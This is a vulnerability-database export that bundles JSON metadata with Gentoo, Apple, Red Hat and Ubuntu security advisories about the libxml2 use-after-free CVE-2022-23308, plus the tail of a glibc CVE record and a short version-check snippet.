"url": "https://access.redhat.com/errata/rhsa-2022:0318"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3426"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-393646",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-33574",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164863",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166051",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165096",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165002",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165758",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-33574",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-05-25T00:00:00",
"db": "VULHUB",
"id": "VHN-393646",
"ident": null
},
{
"date": "2021-05-25T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33574",
"ident": null
},
{
"date": "2021-12-15T15:20:33",
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"date": "2021-11-10T17:08:43",
"db": "PACKETSTORM",
"id": "164863",
"ident": null
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"date": "2022-02-18T16:37:39",
"db": "PACKETSTORM",
"id": "166051",
"ident": null
},
{
"date": "2021-11-15T17:25:56",
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"date": "2021-11-29T18:12:32",
"db": "PACKETSTORM",
"id": "165096",
"ident": null
},
{
"date": "2021-12-02T16:06:16",
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"date": "2021-11-17T15:25:40",
"db": "PACKETSTORM",
"id": "165002",
"ident": null
},
{
"date": "2022-01-28T14:33:13",
"db": "PACKETSTORM",
"id": "165758",
"ident": null
},
{
"date": "2021-05-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"ident": null
},
{
"date": "2021-05-25T22:15:10.410000",
"db": "NVD",
"id": "CVE-2021-33574",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-11-08T00:00:00",
"db": "VULHUB",
"id": "VHN-393646",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33574",
"ident": null
},
{
"date": "2022-10-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"ident": null
},
{
"date": "2023-11-07T03:35:52.810000",
"db": "NVD",
"id": "CVE-2021-33574",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "GNU C Library Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
}
],
"trust": 0.6
}
}
VAR-202202-0906
Vulnerability from variot - Updated: 2026-03-09 22:00

valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202210-03
https://security.gentoo.org/
Severity: High
Title: libxml2: Multiple Vulnerabilities
Date: October 16, 2022
Bugs: #833809, #842261, #865727
ID: 202210-03
Synopsis
Multiple vulnerabilities have been discovered in libxml2, the worst of which could result in arbitrary code execution.
Background
libxml2 is the XML C parser and toolkit developed for the GNOME project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.10.2 >= 2.10.2
Description
Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All libxml2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.10.2"
References
[ 1 ] CVE-2022-23308 https://nvd.nist.gov/vuln/detail/CVE-2022-23308
[ 2 ] CVE-2022-29824 https://nvd.nist.gov/vuln/detail/CVE-2022-29824
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202210-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 .
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-05-16-1 iOS 15.5 and iPadOS 15.5
iOS 15.5 and iPadOS 15.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213258.
AppleAVD Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-26702: an anonymous researcher
AppleGraphicsControl Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative
AVEVideoEncoder Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-26736: an anonymous researcher CVE-2022-26737: an anonymous researcher CVE-2022-26738: an anonymous researcher CVE-2022-26739: an anonymous researcher CVE-2022-26740: an anonymous researcher
DriverKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An out-of-bounds access issue was addressed with improved bounds checking. CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)
GPU Drivers Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26744: an anonymous researcher
ImageIO Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow issue was addressed with improved input validation. CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative
IOKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab
IOMobileFrameBuffer Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26768: an anonymous researcher
IOSurfaceAccelerator Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26771: an anonymous researcher
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved validation. CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs_sg)
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-26757: Ned Williamson of Google Project Zero
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations Description: A memory corruption issue was addressed with improved validation. CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication Description: A race condition was addressed with improved state handling. CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)
LaunchServices Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An access issue was addressed with additional sandbox restrictions on third-party applications. CVE-2022-26706: Arsenii Kostromin (0x3c3e)
libxml2 Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2022-23308
Notes Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing a large input may lead to a denial of service Description: This issue was addressed with improved checks. CVE-2022-22673: Abhay Kailasia (@abhay_kailasia) of Lakshmi Narain College Of Technology Bhopal
Safari Private Browsing Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious website may be able to track users in Safari private browsing mode Description: A logic issue was addressed with improved state management. CVE-2022-26731: an anonymous researcher
Security Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious app may be able to bypass signature validation Description: A certificate parsing issue was addressed with improved checks. CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)
Shortcuts Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A person with physical access to an iOS device may be able to access photos from the lock screen Description: An authorization issue was addressed with improved state management. CVE-2022-26703: Salman Syed (@slmnsd551)
WebKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing maliciously crafted web content may lead to code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 238178 CVE-2022-26700: ryuzaki
WebKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 236950 CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab WebKit Bugzilla: 237475 CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab WebKit Bugzilla: 238171 CVE-2022-26717: Jeonghoon Shin of Theori
WebKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 238183 CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab WebKit Bugzilla: 238699 CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech
WebRTC Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call Description: A logic issue in the handling of concurrent media was addressed with improved state handling. WebKit Bugzilla: 237524 CVE-2022-22677: an anonymous researcher
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may disclose restricted memory Description: A memory corruption issue was addressed with improved validation. CVE-2022-26745: an anonymous researcher
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to elevate privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR Team
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2015-4142: Kostya Kortchinsky of Google Security Team
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2022-26762: Wang Yu of Cyberserval
Additional recognition
AppleMobileFileIntegrity We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing for their assistance.
FaceTime We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing for their assistance.
WebKit We would like to acknowledge James Lee, an anonymous researcher for their assistance.
Wi-Fi We would like to acknowledge 08Tc3wBB of ZecOps Mobile EDR Team for their assistance.
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 15.5 and iPadOS 15.5". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TQACgkQeC9qKD1p rhh9PRAApeuHnWvZRxSW/QArItDF2fA1eXCu7n9BwPA6CoqrU7v7aR6H/NQ3wes6 xOjoRccHRCWRJ12RubM06ggC+WA/MLb96t2Wc4IUoFDkI3G6fp/I3aHpSONv4YMt EoHSGMpJ3qAb6Z60mIMcshsCtyv9k4LxpjOTnHKRLp/M4JLWG4CanOGpN2u/wPPV TpRY4jkZlAdvQK3qrPmA8aO5sWnbh5l//kUS6IL649seZQFUeZdz7QUyodjjqr2/ XWyqsQC4mqVphxwvWDWA5J6/Zf7C7hNdZ1BE+SPpLhjEZlU6IYBFY2PLrg9NDTv8 YMZpftlm5HQo3qmy/HLoiF8bIqgtdz+TpgNiT+TYz9+/pvP/hyGbX6xF9esKBVjj +1OUnd2GaLjSdY7o9WOtZgSJQxi1/R1X1+DjY1vI+d/TQZ+Sz58Me90R99aWc+Gc 1B8e6FhjwT48rHJiuIw75ZW1orpUX6OL5vqdge0H1aJXm7EEUhByZvm2E2DajKu2 mp2jr01UZyb3ro0qE1zpNitNORWAdvrlriIJxFVxtxW4MygMn8ThJ/Jz2LjquHvT EwvCyB9jaqPKja3b/dwzf/nowjw+aocxOjelW2Q/HcyR13YF2ZHd1+hNtG/7Isrx WIpI9nNAQQ2LCQIgL7/xCn6Yni9t3le3+eU+cdafoqJKTpETNbk= =OMfW -----END PGP SIGNATURE-----
Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 8.
Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
- libxml2: Use-after-free of ID and IDREF attributes (CVE-2022-23308)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect.
Package List:
Red Hat Enterprise Linux AppStream (v. 8)
Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Description:
Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.
Bugs fixed (https://bugzilla.redhat.com/):
2062751 - CVE-2022-24730 argocd: path traversal and improper access control allows leaking out-of-bound files 2062755 - CVE-2022-24731 argocd: path traversal allows leaking out-of-bound files 2064682 - CVE-2022-1025 Openshift-Gitops: Improper access control allows admin privilege escalation
- Description:
This release adds the new Apache HTTP Server 2.4.37 Service Pack 11 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Service Pack 10 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release.
Bugs fixed (https://bugzilla.redhat.com/):
1950515 - CVE-2021-3541 libxml2: Exponential entity expansion attack bypasses all existing protection mechanisms 1954225 - CVE-2021-3516 libxml2: Use-after-free in xmlEncodeEntitiesInternal() in entities.c 1954232 - CVE-2021-3517 libxml2: Heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c 1954242 - CVE-2021-3518 libxml2: Use-after-free in xmlXIncludeDoProcess() in xinclude.c 1956522 - CVE-2021-3537 libxml2: NULL pointer dereference when post-validating mixed content parsed in recovery mode 2056913 - CVE-2022-23308 libxml2: Use-after-free of ID and IDREF attributes 2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates 2064321 - CVE-2022-22720 httpd: Errors encountered during the discarding of request body lead to HTTP request smuggling
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes
Advisory ID: RHSA-2022:1081-01
Product: Red Hat ACM
Advisory URL: https://access.redhat.com/errata/RHSA-2022:1081
Issue date: 2022-03-28
CVE Names: CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2021-3200 CVE-2021-3445 CVE-2021-3521 CVE-2021-3580 CVE-2021-3712 CVE-2021-3800 CVE-2021-3999 CVE-2021-20231 CVE-2021-20232 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23177 CVE-2021-28153 CVE-2021-31566 CVE-2021-33560 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-42574 CVE-2021-43565 CVE-2022-23218 CVE-2022-23219 CVE-2022-23308 CVE-2022-23806 CVE-2022-24407
====================================================================
1. Summary:
Gatekeeper Operator v0.2
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Gatekeeper Operator v0.2
Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters.
This advisory contains the container images for Gatekeeper that include security updates, and container upgrades.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Note: Gatekeeper support from the Red Hat support team is limited to cases where it is integrated and used with Red Hat Advanced Cluster Management for Kubernetes. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/.
Security updates:
- golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
- golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
The requirements to apply the upgraded images differ depending on whether you used the operator. Complete the following steps, depending on your installation:
- Upgrade gatekeeper operator:
The gatekeeper operator that is installed by the gatekeeper operator policy has installPlanApproval set to Automatic. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting for installPlanApproval to manual, then you must view each cluster to manually approve the upgrade to the operator.
- Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version: a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'. c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'.
Refer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/ for additional information.
- Bugs fixed (https://bugzilla.redhat.com/):
2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements
- References:
https://access.redhat.com/security/cve/CVE-2019-5827
https://access.redhat.com/security/cve/CVE-2019-13750
https://access.redhat.com/security/cve/CVE-2019-13751
https://access.redhat.com/security/cve/CVE-2019-17594
https://access.redhat.com/security/cve/CVE-2019-17595
https://access.redhat.com/security/cve/CVE-2019-18218
https://access.redhat.com/security/cve/CVE-2019-19603
https://access.redhat.com/security/cve/CVE-2019-20838
https://access.redhat.com/security/cve/CVE-2020-12762
https://access.redhat.com/security/cve/CVE-2020-13435
https://access.redhat.com/security/cve/CVE-2020-14155
https://access.redhat.com/security/cve/CVE-2020-16135
https://access.redhat.com/security/cve/CVE-2020-24370
https://access.redhat.com/security/cve/CVE-2021-3200
https://access.redhat.com/security/cve/CVE-2021-3445
https://access.redhat.com/security/cve/CVE-2021-3521
https://access.redhat.com/security/cve/CVE-2021-3580
https://access.redhat.com/security/cve/CVE-2021-3712
https://access.redhat.com/security/cve/CVE-2021-3800
https://access.redhat.com/security/cve/CVE-2021-3999
https://access.redhat.com/security/cve/CVE-2021-20231
https://access.redhat.com/security/cve/CVE-2021-20232
https://access.redhat.com/security/cve/CVE-2021-22876
https://access.redhat.com/security/cve/CVE-2021-22898
https://access.redhat.com/security/cve/CVE-2021-22925
https://access.redhat.com/security/cve/CVE-2021-23177
https://access.redhat.com/security/cve/CVE-2021-28153
https://access.redhat.com/security/cve/CVE-2021-31566
https://access.redhat.com/security/cve/CVE-2021-33560
https://access.redhat.com/security/cve/CVE-2021-36084
https://access.redhat.com/security/cve/CVE-2021-36085
https://access.redhat.com/security/cve/CVE-2021-36086
https://access.redhat.com/security/cve/CVE-2021-36087
https://access.redhat.com/security/cve/CVE-2021-42574
https://access.redhat.com/security/cve/CVE-2021-43565
https://access.redhat.com/security/cve/CVE-2022-23218
https://access.redhat.com/security/cve/CVE-2022-23219
https://access.redhat.com/security/cve/CVE-2022-23308
https://access.redhat.com/security/cve/CVE-2022-23806
https://access.redhat.com/security/cve/CVE-2022-24407
https://access.redhat.com/security/updates/classification/#moderate
https://open-policy-agent.github.io/gatekeeper/website/docs/howto/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. ========================================================================== Ubuntu Security Notice USN-5324-1 March 14, 2022
libxml2 vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
libxml2 could be made to crash or run programs if it opened a specially crafted file. An attacker could use this issue to cause libxml2 to crash, resulting in a denial of service, or possibly execute arbitrary code.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.10:
  libxml2 2.9.12+dfsg-4ubuntu0.1
  libxml2-utils 2.9.12+dfsg-4ubuntu0.1
Ubuntu 20.04 LTS:
  libxml2 2.9.10+dfsg-5ubuntu0.20.04.2
  libxml2-utils 2.9.10+dfsg-5ubuntu0.20.04.2
Ubuntu 18.04 LTS:
  libxml2 2.9.4+dfsg1-6.1ubuntu1.5
  libxml2-utils 2.9.4+dfsg1-6.1ubuntu1.5
In general, a standard system update will make all the necessary changes.
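All of the advisories collected above key off the same affected range: upstream libxml2 releases before 2.9.13, where CVE-2022-23308 was fixed. As a rough illustration (not taken from any advisory), that range check is a simple tuple comparison. Note that distribution packages, such as the Ubuntu 2.9.10+dfsg builds listed above, backport the fix, so comparing the upstream version number alone says nothing about a distro-patched package:

```python
# Hypothetical helper: decide whether an *upstream* libxml2 release
# predates the CVE-2022-23308 fix, which shipped in 2.9.13.
# Distro packages (e.g. Ubuntu's 2.9.10+dfsg-5ubuntu0.20.04.2) often
# carry the fix as a backport, so this check does not apply to them.

FIXED_IN = (2, 9, 13)

def parse_version(version: str) -> tuple:
    """Turn a dotted upstream version like '2.9.12' into an int tuple."""
    return tuple(int(part) for part in version.split("."))

def is_affected(version: str) -> bool:
    """True if this upstream libxml2 release predates the 2.9.13 fix."""
    return parse_version(version) < FIXED_IN
```

For example, `is_affected("2.9.12")` is True, while both `is_affected("2.9.13")` and `is_affected("2.10.2")` (the version Gentoo directs users to) are False.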
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "manageability software development kit",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.4"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "solidfire \\\u0026 hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "libxml2",
"scope": "lt",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.9.13"
},
{
"_id": null,
"model": "snapdrive",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.5"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
